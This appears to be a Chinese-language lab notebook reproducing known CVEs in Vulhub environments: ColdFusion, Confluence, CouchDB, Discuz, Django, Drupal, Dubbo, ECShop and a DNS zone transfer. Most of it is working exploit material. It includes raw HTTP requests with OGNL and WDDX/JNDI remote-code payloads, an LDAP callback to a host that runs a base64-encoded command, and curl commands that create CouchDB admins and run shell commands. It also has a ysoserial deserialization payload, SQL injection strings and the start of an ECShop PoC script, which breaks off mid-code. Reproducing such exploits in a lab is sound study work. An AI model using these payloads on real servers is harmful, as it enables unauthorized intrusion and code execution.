• https://blog.projectdiscovery.io/adobe-coldfusion-rce/
• https://xz.aliyun.com/t/13413

漏洞复现

要利用这个漏洞，需要先找到一个可利用的setter方法作为Gadget。最常见的Gadget是利用com.sun.rowset.JdbcRowSetImpl来进行JNDI注入，并执行任意命令。

首先，启动一个恶意JNDI服务器，并加载CommonsBeanutils1作为内层反序列化Gadget。Github上有数个工具可以使用，比如https://github.com/rebeyond/JNDInjector/releases：

然后，将恶意LDAP地址替换到如下请求中发送：

POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 333

argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://192.168.0.196/PJlkCbYLJV/CommonsBeanutils1/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3dvd3dlZGlkaXQifQ==</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>

localhost处改端口似乎是必要的 改完就成功复现了

可见，touch /tmp/success已被成功执行：

Atlassian Confluence 路径穿越与命令执行漏洞（CVE-2019-3396）

Atlassian Confluence是企业广泛使用的wiki系统，其6.14.2版本前存在一处未授权的目录穿越漏洞，通过该漏洞，攻击者可以读取任意文件，或利用Velocity模板注入执行任意命令。

参考资料：

• https://paper.seebug.org/884/
• https://jira.atlassian.com/browse/CONFSERVER-57974

漏洞复现

环境启动后，访问http://your-ip:8090会进入安装引导，选择“Trial installation”，之后会要求填写license key。点击“Get an evaluation license”，去Atlassian官方申请一个Confluence Server的测试证书：

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长（建议使用4G内存以上的机器进行安装与测试），请耐心等待。

如果提示填写cluster node，路径填写/home/confluence即可：

发送如下数据包，即可读取文件web.xml：

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

Atlassian Confluence OGNL表达式注入命令执行漏洞（CVE-2021-26084）

Atlassian Confluence是企业广泛使用的wiki系统，其部分版本中存在OGNL表达式注入漏洞。攻击者可以通过这个漏洞，无需任何用户的情况下在目标Confluence中执行任意代码。

参考链接：

• https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
• https://jira.atlassian.com/browse/CONFSERVER-67940
• https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
• https://github.com/h3v0x/CVE-2021-26084_Confluence

漏洞利用

有多个接口可以触发这个OGNL表达式注入漏洞。

/pages/doenterpagevariables.action

这个接口不需要登录即可利用，发送如下数据包，即可看到233*233已被执行：

POST /pages/doenterpagevariables.action HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027

执行任意命令：

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

/pages/createpage-entervariables.action

这个路径也不需要用户登录：

POST /pages/createpage-entervariables.action HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027

/pages/createpage.action

这个接口需要一个可以创建页面的用户权限：

GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
Host: 192.168.1.162:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.162:8090/template/custom/content-editor.vm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=7B35600F54A9E303CE8C277ED960E1E7; seraph.confluence=524289%3A2ac32a308478b9cb9f0e351a12470faa4f2a928a
Connection: close

Confluence OGNL表达式注入命令执行漏洞（CVE-2022-26134）

Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。

参考链接：

• https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
• https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

漏洞复现

该漏洞利用方法十分简单，直接发送如下请求即可执行任意命令，并在HTTP返回头中获取执行结果：

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

Confluence 属性覆盖导致权限绕过漏洞 (CVE-2023-22515)

Atlassian Confluence是企业广泛使用的wiki系统。

2023年10月4日，Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致，利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

该漏洞不影响8.0.0以前的版本。

参考链接：

• https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html
• https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

漏洞复现

首先，最主要的请求就是覆盖目标Confluence服务器中的bootstrapStatusProvider.applicationConfig.setupComplete属性：

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0

然后，你就可以使用如下请求创建一个新的管理员账户vulhub：

POST /setup/setupadministrator.action HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
X-Atlassian-Token: no-check

username=vulhub&fullName=vulhub&email=admin%40vulhub.org&password=vulhub&confirm=vulhub&setup-next-button=Next

发送如下请求完成安装步骤：

POST /setup/finishsetup.action HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
X-Atlassian-Token: no-check

最后，直接使用新的vulhub账户（密码同样是vulhub）来登录Confluence，可见新的管理员已成功增加：

老卡在第一步…没成功

Confluence OGNL表达式注入命令执行漏洞（CVE-2023-22527）

Atlassian Confluence是企业广泛使用的wiki系统。

在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

参考链接：

• https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
• https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/

漏洞复现

漏洞复现

该漏洞利用方法十分简单，直接发送如下请求即可执行任意命令，并在HTTP返回头中获取执行结果：

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

Couchdb 垂直权限绕过漏洞（CVE-2017-12635）

Couchdb 垂直权限绕过漏洞（CVE-2017-12635）

Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同，导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员，属于垂直权限绕过漏洞。

影响版本：小于 1.7.0 以及 小于 2.1.1

参考链接：

• http://bobao.360.cn/learning/detail/4716.html
• https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

漏洞复现

首先，发送如下数据包：

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

可见，返回403错误：{"error":"forbidden","reason":"Only _admin may set roles"}，只有管理员才能设置Role角色：

发送包含两个roles的数据包，即可绕过限制：

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

成功创建管理员，账户密码均为vulhub：

再次访问http://your-ip:5984/_utils/，输入账户密码vulhub，可以成功登录：

Couchdb 任意命令执行漏洞（CVE-2017-12636）

Apache CouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。

影响版本：小于 1.7.0 以及 小于 2.1.1

参考链接：

• http://bobao.360.cn/learning/detail/4716.html
• https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

漏洞复现

该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用CVE-2017-12635先增加一个管理员用户。

1.6.0 下的说明

依次执行如下请求即可触发任意命令执行：

curl -X PUT 'http://vulhub:vulhub@127.0.0.1:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@127.0.0.1:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@127.0.0.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@127.0.0.1:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers，其值为"id >/tmp/success"，这就是我们后面待执行的命令。

第二、三个请求是添加一个Database和Document，这里添加了后面才能查询。

第四个请求就是在这个Database里进行查询，因为我将language设置为cmd，这里就会用到我第一步里添加的名为cmd的query_servers，最后触发命令执行。

CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706)

Apache CouchDB是一个Erlang开发的NoSQL数据库。

由于Erlang的特性，其支持分布式计算，分布式节点之间通过Erlang/OTP Distribution协议进行通信。攻击者如果知道通信时使用的Cookie，即可在握手包通过认证并执行任意命令。

在CouchDB 3.2.1及以前版本中，使用了默认Cookie，值为“monster”。

参考链接：

• https://docs.couchdb.org/en/3.2.2-docs/cve/2022-24706.html
• https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
• https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/erlang_cookie_rce.rb
• https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit

漏洞复现

我们可以使用这个POC来利用本漏洞。这个POC会先通过目标的4369端口epmd服务获取集群通信的端口，也就是9100，然后再使用默认Cookie来控制节点执行任意命令。

>python poc.py target-ip 4369

Discuz 7.x/6.x 全局变量防御绕过导致代码执行

由于php5.3.x版本里php.ini的设置里request_order默认值为GP，导致$_REQUEST中不再包含$_COOKIE，我们通过在Cookie中传入$GLOBALS来覆盖全局变量，造成代码执行漏洞。

具体原理请参考：

• https://www.secpulse.com/archives/2338.html

漏洞复现

安装成功后，直接找一个已存在的帖子，向其发送数据包，并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();：

GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Connection: close

可见，phpinfo已成功执行：

Django debug page XSS漏洞（CVE-2017-12794）分析

Django发布了新版本1.11.5，修复了500页面中可能存在的一个XSS漏洞，这篇文章说明一下该漏洞的原理和复现，和我的一点点评。

漏洞复现

经过我的测试，我发现在使用Postgres数据库并触发异常的时候，psycopg2会将字段名和字段值全部抛出。那么，如果字段值中包含我们可控的字符串，又由于0x02中说到的，这个字符串其实就会被设置成__cause__，最后被显示在页面中。

所以我们假设有如下场景：

1. 用户注册页面，未检查用户名
2. 注册一个用户名为<script>alert(1)</script>的用户
3. 再次注册一个用户名为<script>alert(1)</script>的用户
4. 触发duplicate key异常，导致XSS漏洞

我将上述流程整理成vulhub的一个环境：https://github.com/phith0n/vulhub/tree/master/django/CVE-2017-12794

编译及启动环境：

>docker compose up -d

访问http://your-ip:8000/create_user/?username=<script>alert(1)</script>创建一个用户，成功；再次访问http://your-ip:8000/create_user/?username=<script>alert(1)</script>，触发异常：

可见，Postgres抛出的异常为

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.

这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception，最后触发XSS。

Django < 2.0.8 任意URL跳转漏洞（CVE-2018-14574）

Django默认配置下，如果匹配上的URL路由中最后一位是/，而用户访问的时候没加/，Django默认会跳转到带/的请求中。（由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定）。

在path开头为//example.com的情况下，Django没做处理，导致浏览器认为目的地址是绝对路径，最终造成任意URL跳转漏洞。

该漏洞利用条件是目标URLCONF中存在能匹配上//example.com的规则。

漏洞复现

访问http://your-ip:8000//www.example.com，即可返回是301跳转到//www.example.com/：

Django JSONField/HStoreField SQL注入漏洞（CVE-2019-14234）

Django在2019年8月1日发布了一个安全更新，修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。

参考链接：

• https://www.djangoproject.com/weblog/2019/aug/01/security-releases/
• https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html

该漏洞需要开发者使用了JSONField/HStoreField，且用户可控queryset查询时的键名，在键名的位置注入SQL语句。Django自带的后台应用Django-Admin中就存在这样的写法，我们可以直接借助它来复现漏洞。

漏洞复现

首先登陆后台http://your-ip:8000/admin/，用户名密码为admin、a123123123。

登陆后台后，进入模型Collection的管理页面http://your-ip:8000/admin/vuln/collection/：

然后在GET参数中构造detail__a'b=123提交，其中detail是模型Collection中的JSONField：

http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123

可见，单引号已注入成功，SQL语句报错：

Django GIS SQL注入漏洞（CVE-2020-9402）

Django在2020年3月4日发布了一个安全更新，修复了在GIS 查询功能中存在的SQL注入漏洞。

参考链接：

• https://www.djangoproject.com/weblog/2020/mar/04/security-releases/

该漏洞需要开发者使用了GIS中聚合查询的功能，用户在oracle的数据库且可控tolerance查询时的键名，在其位置注入SQL语句。

漏洞复现

漏洞一

首先访问http://your-ip:8000/vuln/。

在该网页中使用get方法构造q的参数，构造SQL注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1

http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

可见，括号已注入成功，SQL语句查询报错：

漏洞二

访问http://your-ip:8000/vuln2/。
在该网页中使用get方法构造q的参数，构造出SQL注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

Django QuerySet.order_by() SQL注入漏洞（CVE-2021-35042）

Django在2021年7月1日发布了一个安全更新，修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞

参考链接:

• https://www.djangoproject.com/weblog/2021/jul/01/security-releases/

该漏洞需要用户可控order_by传入的值，在预期列的位置注入SQL语句。

漏洞复现

访问页面http://your-ip:8000/vuln/，在GET参数中构造order=-id，会得到根据id降序排列的结果：
http://your-ip:8000/vuln/?order=-id

再构造GET参数order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23提交，其中vuln_collection是vuln应用下的模型Collection

http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23

成功注入SQL语句，利用堆叠注入获得信息：

Django Trunc(kind) and Extract(lookup_name) SQL注入漏洞（CVE-2022-34265）

Django在2022年7月4日发布了安全更新，修复了在数据库函数Trunc()和Extract()中存在的SQL注入漏洞。

参考链接：

• https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
• https://github.com/django/django/commit/0dc9c016fadb71a067e5a42be30164e3f96c0492

漏洞复现

修改date参数即可复现SQL注入漏洞：

http://your-ip:8000/?date=xxxx'xxxx

DNS域传送漏洞

DNS协议支持使用axfr类型的记录进行区域传送，用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源，将会导致DNS域传送漏洞。

参考链接：

• https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/
• https://nmap.org/nsedoc/scripts/dns-zone-transfer.html

漏洞复现

在Linux下，我们可以使用dig命令来发送dns请求。比如，我们可以用dig @your-ip www.vulhub.org获取域名www.vulhub.org在目标dns服务器上的A记录：

发送axfr类型的dns请求：dig @your-ip -t axfr vulhub.org

可见，我获取到了vulhub.org的所有子域名记录，这里存在DNS域传送漏洞。

我们也可以用nmap script来扫描该漏洞：nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 192.168.0.196

Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）

Drupal 是一款用量庞大的CMS，其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞，攻击者可以执行任意SQL语句，插入、修改管理员信息，甚至执行任意代码。

漏洞复现

该漏洞无需认证，发送如下数据包即可执行恶意SQL语句：

POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

可见，信息已被爆出：

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞（CVE-2017-6920）（未完成）

• 影响软件：Drupal
• 方式：反序列化
• 参考链接：CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
• 效果：任意代码执行

漏洞复现

apt update网络超时…
先跳了

Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

Drupal 是一款用量庞大的CMS，其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关分析如下：

• https://research.checkpoint.com/uncovering-drupalgeddon-2/

漏洞复现

参考a2u/CVE-2018-7600，我们向安装完成的drupal发送如下数据包：

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

成功执行代码，这个代码最终执行了id命令：

Drupal 远程代码执行漏洞（CVE-2018-7602）

• 影响软件：drupal
• 方式：对URL中的#进行编码两次，绕过sanitize()函数过滤
• 效果：任意命令执行

漏洞复现

参考pimps/CVE-2018-7600的PoC。

如下图所示，执行以下命令即可复现该漏洞。示例命令为 id，如图红框中显示，可以执行该命令。

# "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码
python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/

Drupal 远程代码执行漏洞（CVE-2019-6339）

• 影响软件：Drupal
• 方式：phar反序列化RCE
• 参考链接：Drupal 1-click to RCE 分析
• 效果：任意命令执行

漏洞复现

如下图所示，先使用管理员用户上传头像，头像图片为构造好的 PoC，参考thezdi/PoC的PoC。

Drupal 的图片默认存储位置为 /sites/default/files/pictures/<YYYY-MM>/，默认存储名称为其原来的名称，所以之后在利用漏洞时，可以知道上传后的图片的具体位置。

访问 http://127.0.0.1:8080/admin/config/media/file-system，在 Temporary directory 处输入之前上传的图片路径，示例为 phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg，保存后将触发该漏洞。如下图所示，触发成功。

如果不知道图片具体目录可以查看docker下的file目录或使用find命令

Drupal XSS漏洞（CVE-2019-6341）

• 影响软件：Drupal
• 方式：通过文件模块或者子系统上传恶意文件触发XSS漏洞
• 参考链接：Drupal 1-click to RCE 分析
• 效果：JS代码执行（Cookies 资料窃取、会话劫持、钓鱼欺骗、网页挂马等）

漏洞复现

该漏洞需要利用drupal文件模块上传文件的漏洞，伪造一个图片文件，上传，文件的内容实际是一段HTML代码，内嵌JS，这样其他用户在访问这个链接时，就可能触发XSS漏洞。

Drupal 的图片默认存储位置为 /sites/default/files/pictures/<YYYY-MM>/，默认存储名称为其原来的名称，所以之后在利用漏洞时，可以知道上传后的图片的具体位置。

使用PoC上传构造好的伪造GIF文件，PoC参考thezdi/PoC的PoC。

如图，输入如下命令，即可使用PoC构造样本并完成上传功能，第一个参数为目标IP 第二个参数为目标端口。

php cve-2019-6341-exp.php 192.168.11.1 8080

上传成功后，访问图片位置，即可触发 XSS 漏洞，如下图所示。

Tips:

1. 因为 Chrome 和 FireFox 浏览器自带部分过滤 XSS 功能，所以验证存在时可使用 Edge 浏览器或者 IE 浏览器。
2. 访问的图片名称为_0的原因是因为 Drupal 的规则机制，具体原理见Drupal 1-click to RCE 分析

Aapche Dubbo Java反序列化漏洞（CVE-2019-17564）

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信，当使用http协议时，Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用，而这个过程会读取POST请求的Body并进行反序列化，最终导致漏洞。

在Spring文档中，对HttpInvokerServiceExporter有如下描述，并不建议使用：

WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.

这个漏洞影响Apache Dubbo 2.7.4及以前版本，2.7.5后Dubbo使用com.googlecode.jsonrpc4j.JsonRpcServer替换了HttpInvokerServiceExporter。

参考链接：

• https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.html
• https://www.anquanke.com/post/id/198747
• https://paper.seebug.org/1128/

漏洞复现

利用该漏洞需要先知道目标RPC接口名，而Dubbo所有的RPC配置储存在registry中，通常使用Zookeeper作为registry。如果能刚好找到目标的Zookeeper未授权访问漏洞，那么就可以在其中找到接口的名称与地址。

Vulhub对外开放了8080端口和2181端口，其中2181即为Zookeeper的端口，我们本地下载Zookeeper，使用其中自带的zkCli即可连接到这台Zookeeper服务器：

./zkCli -server target-ip:2181

连接后进入一个交互式控制台，使用ls即可列出其中所有节点，包括Dubbo相关的配置：

获取到RPC接口名为org.vulhub.api.CalcService。直接用ysoserial生成CommonsCollections6的Payload作为POST Body发送到http://your-ip:8080/org.vulhub.api.CalcService即可触发反序列化漏洞：

java -jar ysoserial.jar CommonsCollections6 "touch /tmp/success" > 1.poc
curl -XPOST --data-binary @1.poc http://your-ip:8080/org.vulhub.api.CalcService

进入容器，可见touch /tmp/success已成功执行。

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中，存在一处SQL注入漏洞，通过该漏洞可注入恶意数据，最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞，vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

参考链接：

• https://paper.seebug.org/691/

漏洞复现

我编写了一个脚本，可以生成2.x和3.x的POC：

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
